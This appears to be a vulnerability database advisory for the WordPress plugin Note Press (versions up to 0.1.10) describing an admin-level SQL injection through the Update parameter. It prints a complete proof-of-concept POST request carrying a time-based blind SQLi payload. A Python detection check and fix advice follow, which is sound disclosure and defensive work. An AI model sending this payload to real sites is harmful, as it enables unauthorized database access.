wpexploit | Daniel Krohmer | WPEX-ID:982F84A1-216D-41ED-87BD-433B695CEC28
History: May 09, 2022 - 12:00 a.m.

Note Press <= 0.1.10 - Admin+ SQLi via Update

EPSS: 0.001 (Low), percentile 21.8%

The plugin does not sanitise and escape the Update parameter before using it in an SQL statement when updating a note via the admin dashboard, leading to an SQL injection.

POST /wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=f5b4b02f56&Title=Test&stickycolor=&Deadline=&Priority=0&iconselect%5B%5D=aablank.png&display_name=admin&Note_Presseditor=&Update=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
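
A detection-side check for the request above, added here as an example and not taken from the plugin or the advisory: it flags POSTs to the Note Press admin page whose Update field is anything other than a plain integer. It assumes a legitimate edit sends Update as a numeric note ID; check_request and the benign sample body are constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

PLUGIN_PAGE = "Note_Press-Main-Menu"   # value of ?page= in the request above
PARAM = "Update"                       # parameter named in the advisory

TARGET = "/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17"
# Constructed benign body (assumption: Update normally carries the note id).
BENIGN_BODY = "Title=Test&Priority=0&Update=17"
# Relevant fields of the body shown in the request above.
POC_BODY = ("Title=Test&Priority=0&"
            "Update=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)")


def check_request(method, target, body):
    """Return (param, decoded_value) pairs that are not plain integers.

    Only POSTs to the Note Press admin page are inspected; any other
    request returns an empty list.
    """
    url = urlsplit(target)
    if method.upper() != "POST" or not url.path.endswith("/wp-admin/admin.php"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    if PLUGIN_PAGE not in query.get("page", []):
        return []
    # parse_qs decodes '+' and %XX, so the check sees what PHP would see.
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    # Every occurrence is checked, so a repeated Update field cannot hide
    # a bad value behind a good one.
    for value in form.get(PARAM, []):
        if not (value.isascii() and value.isdigit()):
            findings.append((PARAM, value))
    return findings


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("advisory", POC_BODY)):
        print(label, check_request("POST", TARGET, body))
```

The same allow-list rule (integer only) is what the server-side fix amounts to: cast the value to an integer or bind it through a prepared statement before it reaches the query.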
